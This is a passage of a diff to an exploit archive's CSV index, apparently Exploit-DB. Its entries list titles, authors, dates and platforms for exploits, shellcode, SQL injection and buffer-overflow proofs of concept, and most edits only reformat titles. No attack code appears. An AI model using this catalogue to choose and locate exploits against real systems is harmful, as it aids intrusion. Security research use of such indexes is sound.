(ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion Vulnerability",2011-11-24,"Akin Tosunlar",cgi,webapps,0 -18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(""/bin/sh""_ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 +18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 18156,platforms/php/webapps/18156.txt,"php video script SQL Injection Vulnerability",2011-11-25,longrifle0x,php,webapps,0 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0 @@ -15849,7 +15849,7 @@ id,file,description,date,author,platform,type,port 18272,platforms/windows/dos/18272.py,"Windows Explorer Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18274,platforms/php/webapps/18274.txt,"openemr 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 18275,platforms/win64/dos/18275.txt,"GdiDrawStream BSoD using Safari",2011-12-18,webDEViL,win64,dos,0 -18276,platforms/php/webapps/18276.txt,"Wordpress Mailing List Plugin Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 +18276,platforms/php/webapps/18276.txt,"Wordpress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script Arbitrary File Upload Vulnerability",2011-12-26,ySecurity,php,webapps,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0 18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid: Remote Root function pointer overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 @@ -15882,7 +15882,7 @@ id,file,description,date,author,platform,type,port 18979,platforms/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 Tagging Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 18320,platforms/php/webapps/18320.txt,"Posse Softball Director CMS (team.php) Blind SQL Injection Vulnerability",2012-01-04,"Easy Laster",php,webapps,0 -19381,platforms/php/webapps/19381.php,"SugarCRM CE <= 6.3.1 - ""unserialize()"" PHP Code Execution",2012-06-23,EgiX,php,webapps,0 +19381,platforms/php/webapps/19381.php,"SugarCRM CE <= 6.3.1 - _unserialize()_ PHP Code Execution",2012-06-23,EgiX,php,webapps,0 18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0 18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 18327,platforms/netware/dos/18327.txt,"Novell Netware XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 @@ -15904,12 +15904,12 @@ id,file,description,date,author,platform,type,port 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 -18350,platforms/php/webapps/18350.txt,"Wordpress Age Verification Plugin <= 0.4 Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 +18350,platforms/php/webapps/18350.txt,"Wordpress Age Verification Plugin <= 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 18351,platforms/netware/dos/18351.txt,"Novell Netware XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script SQL Injection Vulnerability",2012-01-12,"Robert Cooper",php,webapps,0 -18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin Blind SQL Injection Vulnerability",2012-01-12,longrifle0x,php,webapps,0 +18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin - Blind SQL Injection Vulnerability",2012-01-12,longrifle0x,php,webapps,0 18354,platforms/windows/remote/18354.py,"WorldMail imapd 3.0 SEH Overflow (egg hunter)",2012-01-12,TheXero,windows,remote,0 -18355,platforms/php/webapps/18355.txt,"Wordpress Count-per-day plugin Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 +18355,platforms/php/webapps/18355.txt,"Wordpress Count-per-day plugin - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload Vulnerability",2012-01-13,Dr.KroOoZ,php,webapps,0 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 @@ -15953,7 +15953,7 @@ id,file,description,date,author,platform,type,port 18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0 18405,platforms/asp/webapps/18405.txt,"ARYADAD Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 18411,platforms/linux/local/18411.c,"Linux Kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (#1)",2012-01-23,zx2c4,linux,local,0 -18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 +18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service Vulnerability",2012-04-04,condis,windows,dos,0 18699,platforms/php/webapps/18699.txt,"PlumeCMS <= 1.2.4 - Multiple Persistent XSS",2012-04-04,"Ivano Binetti",php,webapps,0 @@ -15967,7 +15967,7 @@ id,file,description,date,author,platform,type,port 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (MSF Module)",2012-01-26,"Craig Freyman",windows,remote,0 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,metasploit,windows,remote,0 -18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 - ""proc_deutf()"" Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 +18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 - _proc_deutf()_ Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18429,platforms/php/webapps/18429.pl,"4images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 @@ -16092,7 +16092,7 @@ id,file,description,date,author,platform,type,port 18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18571,platforms/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 -18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 - 'cprt' Overflow""",2012-03-08,metasploit,windows,remote,0 +18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 - 'cprt' Overflow_",2012-03-08,metasploit,windows,remote,0 18575,platforms/php/webapps/18575.txt,"RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple security vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 18574,platforms/php/webapps/18574.txt,"RazorCMS <= 1.2.1 STABLE File Upload Vulnerability",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 @@ -16148,7 +16148,7 @@ id,file,description,date,author,platform,type,port 18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - Remote SQL Injection and XSS Vulnerability",2012-03-21,LiquidWorm,php,webapps,0 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection Vulnerability",2012-03-22,rgod,windows,remote,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability",2012-03-22,rgod,windows,dos,0 -18642,platforms/windows/remote/18642.rb,"Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,metasploit,windows,remote,0 +18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,metasploit,windows,remote,0 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 - Remote Buffer Overflow Vulnerability",2012-03-22,"Julien Ahrens",windows,dos,0 18644,platforms/php/webapps/18644.txt,"vBShout Persistent XSS",2012-03-22,ToiL,php,webapps,0 18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM Multiiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0 @@ -16163,7 +16163,7 @@ id,file,description,date,author,platform,type,port 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 -18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow""",2012-03-24,metasploit,windows,remote,0 +18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow_",2012-03-24,metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 @@ -16183,13 +16183,13 @@ id,file,description,date,author,platform,type,port 18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow Vulnerability",2012-03-30,Vulnerability-Lab,windows,local,0 18682,platforms/php/webapps/18682.txt,"ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities",2012-03-30,"SecPod Research",php,webapps,0 -18683,platforms/windows/remote/18683.py,"MailMax <= 4.6 - POP3 - ""USER"" Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 +18683,platforms/windows/remote/18683.py,"MailMax <= 4.6 - POP3 - _USER_ Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 18685,platforms/php/webapps/18685.txt,"dalbum <= 144 build 174 - CSRF Vulnerabilities",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 18686,platforms/php/webapps/18686.txt,"SyndeoCMS <= 3.0.01 Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 [WN]KT KickTipp 3.1 - Remote SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 -18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress Remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 +18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress - Remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 @@ -16275,7 +16275,7 @@ id,file,description,date,author,platform,type,port 18803,platforms/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18804,platforms/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 -18806,platforms/php/webapps/18806.txt,"Wordpress Zingiri Web Shop Plugin <= 2.4.2 Persistent XSS",2012-05-01,"Mehmet Ince",php,webapps,0 +18806,platforms/php/webapps/18806.txt,"Wordpress Zingiri Web Shop Plugin <= 2.4.2 - Persistent XSS",2012-05-01,"Mehmet Ince",php,webapps,0 18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 @@ -16341,7 +16341,7 @@ id,file,description,date,author,platform,type,port 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18893,platforms/hardware/remote/18893.py,"HP VSA Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 18894,platforms/windows/dos/18894.txt,"Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034) (0day)",2012-05-18,Cr4sh,windows,dos,0 -18898,platforms/php/remote/18898.rb,"Active Collab ""chat module"" <= 2.3.8 - Remote PHP Code Injection Exploit",2012-05-19,metasploit,php,remote,0 +18898,platforms/php/remote/18898.rb,"Active Collab _chat module_ <= 2.3.8 - Remote PHP Code Injection Exploit",2012-05-19,metasploit,php,remote,0 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,metasploit,windows,remote,0 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 18900,platforms/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection and XSS Vulnerabilties",2012-05-19,blake,php,webapps,0 @@ -16418,7 +16418,7 @@ id,file,description,date,author,platform,type,port 18999,platforms/php/webapps/18999.php,"SN News (visualiza.php) <= 1.2 - SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service Vulnerability",2012-06-06,Onying,windows,dos,0 19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 -19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 Information Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0 +19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0 @@ -16463,7 +16463,7 @@ id,file,description,date,author,platform,type,port 19055,platforms/php/webapps/19055.txt,"Wordpress Pica Photo Gallery 1.0 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19056,platforms/php/webapps/19056.txt,"Wordpress Mac Photo Gallery 2.7 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19057,platforms/php/webapps/19057.txt,"Wordpress drag and drop file upload 0.1 - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 -19058,platforms/php/webapps/19058.txt,"Wordpress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 +19058,platforms/php/webapps/19058.txt,"Wordpress Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload Vulnerability",2012-06-11,Misa3l,php,webapps,0 19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 @@ -16494,13 +16494,13 @@ id,file,description,date,author,platform,type,port 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 19092,platforms/multiple/remote/19092.py,"MySQL Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server <= 4.0 - Remote File Display / Deletion / Upload / Execution Vulnerability",1998-12-25,rain.forest.puppy,multiple,remote,0 -19094,platforms/windows/remote/19094.txt,"Internet Explorer 4.0/5.0 DHTML Edit ActiveX Control File Stealing and Cross Frame Access Vulnerability",1999-04-22,"Georgi Guninsky",windows,remote,0 +19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4.0/5.0 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access Vulnerability",1999-04-22,"Georgi Guninsky",windows,remote,0 19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 Path Embedded Code Execution Vulnerability",1999-04-20,Shadow,linux,local,0 19096,platforms/linux/remote/19096.c,"RedHat Linux <= 5.1 & Caldera OpenLinux Standard 1.2 - Mountd Vulnerability",1998-08-28,LucySoft,linux,remote,0 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,metasploit,hardware,remote,0 -19100,platforms/php/webapps/19100.rb,"WordPress plugin Foxypress uploadify.php Arbitrary Code Execution",2012-06-13,metasploit,php,webapps,0 +19100,platforms/php/webapps/19100.rb,"WordPress plugin Foxypress uploadify.php - Arbitrary Code Execution",2012-06-13,metasploit,php,webapps,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow Vulnerability (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow Vulnerability (2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX <= 10.34_ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 @@ -16538,9 +16538,9 @@ id,file,description,date,author,platform,type,port 19137,platforms/hardware/dos/19137.rb,"Wyse Machine Remote Power off (DOS) without any privilege",2012-06-14,it.solunium,hardware,dos,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 -19141,platforms/windows/remote/19141.rb,"Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0 +19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0 19142,platforms/linux/local/19142.sh,"Oracle 8 File Access Vulnerabilities",1999-05-06,"Kevin Wenchel",linux,local,0 -19143,platforms/windows/local/19143.c,"Microsoft Windows - ""April Fools 2001"" Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0 +19143,platforms/windows/local/19143.c,"Microsoft Windows - _April Fools 2001_ Vulnerability",1999-01-07,"Richard M. Smith",windows,local,0 19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor Vulnerability",1999-01-07,"Satu Laksela",windows,local,0 19145,platforms/windows/local/19145.c,"NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 Server Operator to Administrator Privilege Escalation: System Key Vulnerability",1999-01-11,Mnemonix,windows,local,0 19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 Vulnerability",1999-01-03,"Dr. Mudge",linux,local,0 @@ -16584,8 +16584,8 @@ id,file,description,date,author,platform,type,port 19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 Getfile Vulnerability",1999-02-11,"Cameron Childress",multiple,remote,0 19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability",1999-02-11,"Gary Geisbert",multiple,remote,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability",1997-07-16,"Paul Ashton",windows,local,0 -19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability",1998-03-19,"Martin Dolphin",windows,local,0 -19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT <= 4.0 SP5_Terminal Server 4.0 - ""Pass the Hash"" with Modified SMB Client Vulnerability",1997-04-08,"Paul Ashton",windows,remote,0 +19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking _Save Password_ Vulnerability",1998-03-19,"Martin Dolphin",windows,local,0 +19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT <= 4.0 SP5_Terminal Server 4.0 - _Pass the Hash_ with Modified SMB Client Vulnerability",1997-04-08,"Paul Ashton",windows,remote,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability",1999-02-18,L0pht,windows,local,0 19199,platforms/solaris/local/19199.c,"Solaris <= 2.5.1 automount Vulnerability",1997-11-26,anonymous,solaris,local,0 19200,platforms/unix/local/19200.c,"BSD/OS <= 2.1 & Caldera UnixWare 7/7.1.0 & FreeBSD 1.1.5.1/2.0 _ HP HP-UX <= 10.34 & IBM AIX <= 4.2 & SGI IRIX <= 6.3 & SunOS <= 4.1.4 - libXt library Vulnerability (1)",1997-08-25,bloodmask,unix,local,0 @@ -16608,7 +16608,7 @@ id,file,description,date,author,platform,type,port 19217,platforms/aix/local/19217.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (5)",1999-05-22,UNYUN,aix,local,0 19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U 2.5 - Buffer Overflow Vulnerabilities",1999-05-03,"Arne Vidstrom",linux,remote,0 19219,platforms/linux/remote/19219.c,"bisonware bisonware ftp server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 -19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server <= 4.0.1 CFCRYPT.EXE Vulnerability",1998-05-19,"Matt Chapman",windows,local,0 +19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server <= 4.0.1 - CFCRYPT.EXE Vulnerability",1998-05-19,"Matt Chapman",windows,local,0 19221,platforms/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Buffer Overflow Vulnerability",1999-05-25,cmart,multiple,remote,0 19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 19223,platforms/multiple/remote/19223.txt,"Floosietek FTGate 2.1 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 @@ -16655,7 +16655,7 @@ id,file,description,date,author,platform,type,port 19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0 19265,platforms/windows/dos/19265.py,"Total Video Player 1.31 - (.m3u) Crash PoC",2012-06-18,0dem,windows,dos,0 19266,platforms/windows/remote/19266.py,"Ezhometech Ezserver 6.4 - Stack Overflow Exploit",2012-06-18,modpr0be,windows,remote,0 -19267,platforms/irix/local/19267.c,"SGI IRIX <= 6.3 -xrm Buffer Overflow Vulnerability",1997-05-27,"David Hedley",irix,local,0 +19267,platforms/irix/local/19267.c,"SGI IRIX <= 6.3 - xrm Buffer Overflow Vulnerability",1997-05-27,"David Hedley",irix,local,0 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin Vulnerabilities",1996-08-06,"Grant Kaufmann",irix,local,0 19269,platforms/irix/local/19269.txt,"SGI IRIX <= 6.0.1 colorview Vulnerability",1995-02-09,"Dave Sill",irix,local,0 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 - Super Syslog Buffer Overflow Vulnerability",1999-02-25,c0nd0r,linux,local,0 @@ -16800,7 +16800,7 @@ id,file,description,date,author,platform,type,port 19431,platforms/php/webapps/19431.txt,"webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability",2012-06-28,dun,php,webapps,0 19432,platforms/jsp/webapps/19432.rb,"Openfire <= 3.6.0a Admin Console Authentication Bypass",2012-06-28,metasploit,jsp,webapps,0 19433,platforms/windows/local/19433.rb,"Apple QuickTime TeXML Stack Buffer Overflow",2012-06-28,metasploit,windows,local,0 -19434,platforms/osx/local/19434.txt,"Quinn ""the Eskimo"" and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability",1999-07-28,"Dawid adix Adamski",osx,local,0 +19434,platforms/osx/local/19434.txt,"Quinn _the Eskimo_ and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability",1999-07-28,"Dawid adix Adamski",osx,local,0 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability",1999-07-29,BrootForce,windows,remote,0 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability",1999-07-29,"Lance Spitzner",hardware,dos,0 19437,platforms/osx/local/19437.txt,"ELS 